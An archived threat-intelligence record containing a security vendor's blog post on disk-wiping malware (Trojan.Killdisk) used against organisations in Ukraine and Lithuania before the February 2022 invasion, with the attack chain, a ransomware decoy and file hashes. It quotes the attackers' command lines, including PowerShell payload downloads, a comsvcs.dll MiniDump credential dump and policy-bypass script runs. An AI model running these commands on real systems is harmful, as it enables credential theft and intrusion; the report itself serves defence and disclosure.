{
	"id": "3a4b7f7e-03ea-4969-a7b6-0a87f1ac394a",
	"created_at": "2026-04-06T00:16:10.586865Z",
	"updated_at": "2026-04-10T13:12:13.967512Z",
	"deleted_at": null,
	"sha1_hash": "3b7613b1af9f781d2155dc35e4b6fd1e60c7879c",
	"title": "Ukraine: Disk-wiping Attacks Precede Russian Invasion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60562,
	"plain_text": "Ukraine: Disk-wiping Attacks Precede Russian Invasion\r\nArchived: 2026-04-05 19:57:26 UTC\r\nUPDATE February 24, 2022, 13:42: This blog has been updated with details about ransomware being used as a\r\npossible decoy during some wiper attacks.\r\nUPDATE February 25, 2022, 17:00: This blog has been updated with details on how a known Microsoft SQL Server \r\nvulnerability (CVE-2021-1636) was exploited in at least one attack.\r\nA new form of disk-wiping malware (Trojan.Killdisk) was used to attack organizations in Ukraine shortly before the\r\nlaunch of a Russian invasion this morning (February 24). Symantec, a division of Broadcom Software, has also found\r\nevidence of wiper attacks against machines in Lithuania. Targeted sectors included financial, defense, aviation, and IT\r\nservices.\r\nTrojan.Killdisk comes in the form of an executable file, which is signed by a certificate issued to Hermetica Digital Ltd.\r\nIt contains 32-bit and 64-bit driver files which are compressed by the Lempel-Ziv algorithm and stored in its resource\r\nsection. The driver files are signed by a certificate issued to EaseUS Partition Master. The malware will drop the\r\ncorresponding file according to the operating system (OS) version of the infected system. Driver file names are\r\ngenerated using the Process ID of the wiper.\r\nOnce run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable. The\r\nwiper does not appear to have any additional functionality beyond its destructive capabilities.\r\nAttack chain\r\nInitial indications suggest that the attacks may have been in preparation for some time. Temporal evidence points to\r\npotentially related malicious activity beginning as early as November 2021. 
However, we are continuing to review and\r\nverify findings.\r\nIn the case of an attack against one organization in Ukraine, the attackers appear to have gained access to the network on\r\nDecember 23, 2021, via malicious SMB activity against a Microsoft Exchange Server. This was immediately followed\r\nby credential theft. A web shell was also installed on January 16, before the wiper was deployed on February 23.\r\nAn organization in Lithuania was compromised from at least November 12, 2021, onwards. It appears the attackers may\r\nhave leveraged a Tomcat exploit in order to execute a PowerShell command. The decoded PowerShell was used to\r\ndownload a JPEG file from an internal server on the victim’s network.\r\ncmd.exe /Q /c powershell -c \"(New-Object\r\nSystem.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1')\"\r\n1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261\r\nA minute later, the attackers created a scheduled task to execute a suspicious ‘postgresql.exe’ file, weekly on a\r\nWednesday, specifically at 11:05 local-time. 
The attackers then ran this scheduled task.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\r\nPage 1 of 3\n\ncmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1\r\nCSIDL_WINDOWS\\policydefinitions\\postgresql.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261\r\nschtasks /run /tn \"\\Microsoft\\Windows\\termsrv\\licensing\\TlsAccess\"\r\nNine minutes later, the attackers modified the scheduled task to execute the same postgresql.exe file at 09:30 local-time\r\ninstead.\r\nBeginning on February 22, Symantec observed the file ‘postgresql.exe’ being executed and used to perform the\r\nfollowing:\r\nExecute certutil to check connectivity to trustsecpro[.]com and whatismyip[.]com\r\nExecute a PowerShell command to download another JPEG file from a compromised web server -\r\nconfluence[.]novus[.]ua\r\nFollowing this activity, PowerShell was used to dump credentials from the compromised machine:\r\ncmd.exe /Q /c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump 600\r\nC:\\asm\\appdata\\local\\microsoft\\windows\\winupd.log full\" 1\u003e \\\\127.0.0.1\\ADMIN$\\__1638457529.1247072\r\n2\u003e\u00261\r\nLater, following the above activity, several unknown PowerShell scripts were executed.\r\npowershell -v 2 -exec bypass -File text.ps1\r\npowershell -exec bypass gp.ps1\r\npowershell -exec bypass -File link.ps1\r\nFive minutes later, the wiper (Trojan.KillDisk) was deployed.\r\nSQL Server exploit\r\nThe attackers appear to have used an exploit of a known vulnerability in Microsoft SQL Server (CVE-2021-1636) in\r\norder to compromise at least one of the targeted organisations. 
In an attack against an organization in Ukraine, the\r\nfollowing process lineage was used to execute the “whoami” command on November 11, 2021:\r\nCSIDL_SYSTEM_DRIVE\\program files\\microsoft sql\r\nserver\\mssql12.mssqlserver\\mssql\\binn\\sqlservr.exe,CSIDL_SYSTEM\\services.exe,CSIDL_SYSTEM\\wininit.exe\r\nThe next day, the same process lineage was responsible for executing the following PowerShell command:\r\n(New-Object System.Net.WebClient).DownloadFile('hxxp://[INTERNAL_HOST]/label.ico','C:\\temp\\sys.tmp1')\r\nThe organization was running an unpatched version of Microsoft SQL Server.\r\nRansomware decoy\r\nIn several attacks Symantec has investigated to date, ransomware was also deployed against affected organizations at the\r\nsame time as the wiper. As with the wiper, scheduled tasks were used to deploy the ransomware. File names used by the\r\nransomware included client.exe, cdir.exe, cname.exe, connh.exe, and intpub.exe. It appears likely that the ransomware\r\nwas used as a decoy or distraction from the wiper attacks. This has some similarities to the earlier WhisperGate wiper\r\nattacks against Ukraine, where the wiper was disguised as ransomware.\r\nDeveloping situation\r\nWith an invasion now underway, there remains a high likelihood of further cyber attacks against Ukraine and other\r\ncountries in the region. 
Symantec’s Threat Hunter Team will continue to actively monitor the situation and post updates\r\nto this blog if new information becomes available.\r\nProtection/Mitigation\r\nSymantec Endpoint products will detect and block this threat using the following signatures:\r\nTrojan.Killdisk\r\nTrojan.Gen.2\r\nTrojan Horse\r\nWs.Malware.2\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 – Trojan.Killdisk\r\n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da – Trojan.Killdisk\r\na64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e – Trojan.Killdisk\r\n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 – Ransomware\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
	],
	"report_names": [
		"ukraine-wiper-malware-russia"
	],
	"threat_actors": [],
	"ts_created_at": 1775434570,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.pdf",
		"text": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.txt",
		"img": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.jpg"
	}
}